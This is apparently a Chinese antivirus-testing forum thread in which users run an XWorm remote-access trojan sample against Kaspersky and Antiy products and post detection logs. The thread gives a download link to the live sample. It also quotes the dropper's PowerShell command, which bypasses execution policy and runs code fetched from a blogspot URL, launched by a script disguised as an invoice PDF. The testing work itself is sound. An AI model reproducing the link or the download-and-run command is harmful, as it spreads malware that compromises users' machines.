Xworm 1x

xiaozhu009

https://wwbxq.lanzouq.com/iZeU93lo7tkf
https://www.virustotal.com/gui/f ... fc487b8a08fb8169e37

vt是0

wwwab

1. 进程ID：8284
   
2. 操作进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   
3. 操作进程命令行："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (IRm https://17marchdoomerg.blogspot.com/lipawaka.otd); Start-Sleep -Seconds 17
   
4. 父进程ID：6840
   
5. 父进程：C:\Windows\System32\wscript.exe
   
6. 父进程命令行：C:\Windows\System32\WScript.exe C:\Users\PC\Downloads\20260327Xworm1x\Invoice#25463.pdf           

复制代码

莒县小哥

martin1230

卡巴双击：
事件: 检测到恶意对象
应用程序: Microsoft ® Windows Based Script Host
用户: WIN11TESTKASPER\vboxuser
用户类型: 发起者
组件: 系统监控
结果描述: 检测到
类型: 木马
名称: PDM:Trojan.Win32.Generic
威胁级别: 高
对象类型: 进程
对象路径: C:\Users\vboxuser\Desktop\20260327Xworm1x
对象名称: Invoice#25463.pdf                                            .js
原因: 行为分析
数据库发布日期: 2026/3/25 18:10:00
MD5: A134874FE01908183E774044853356FE

飞翔的蒲公英

安天智甲：
扫描安全。
双击：拦截PowerShell

wwwab

第一层Payload:

第二层Payload:

第三层Payload:

浦北光

KSN拉黑这么快的吗，VT已经报UDS了

飞翔的蒲公英

wwwab 发表于 2026-3-27 17:27
第一层Payload:

第二层Payload:

在试了在试了：
P1：扫描安全，双击
威胁等级：威胁
检测引擎：威胁行为检测规则
操作类型：启动进程
行为描述：发现恶意shell命令规则命中事件
规则ID：wop0060008
---------------------------------------------
进程ID：7364
进程路径：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
文件MD5：2E5A8590CF6848968FC23DE3FA1E25F1
运行参数："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\……\Desktop\09c1d5_76153a3125fe4557974e2a921c1ed22f\09c1d5_76153a3125fe4557974e2a921c1ed22f.ps1'"
处置方式：阻止启动



P2：扫描安全。
双击：
威胁等级：威胁
检测引擎：威胁行为检测规则
操作类型：启动进程
行为描述：发现恶意shell命令规则命中事件
规则ID：wop0060008
---------------------------------------------
进程ID：4184
进程路径：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
文件MD5：2E5A8590CF6848968FC23DE3FA1E25F1
运行参数："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\……\Desktop\2\09c1d5_5408372e708a48629b728d0ea386361c.ps1'"
处置方式：阻止启动



P3：
解压落地报木马：


双击：
威胁等级：威胁
检测引擎：威胁行为检测规则
操作类型：启动进程
行为描述：发现恶意shell命令规则命中事件
规则ID：wop0060008
---------------------------------------------
进程ID：7904
进程路径：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
文件MD5：2E5A8590CF6848968FC23DE3FA1E25F1
运行参数："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\……\Desktop\3\dtltrn.ps1'"
处置方式：阻止启动

PhozeAMTB

成顔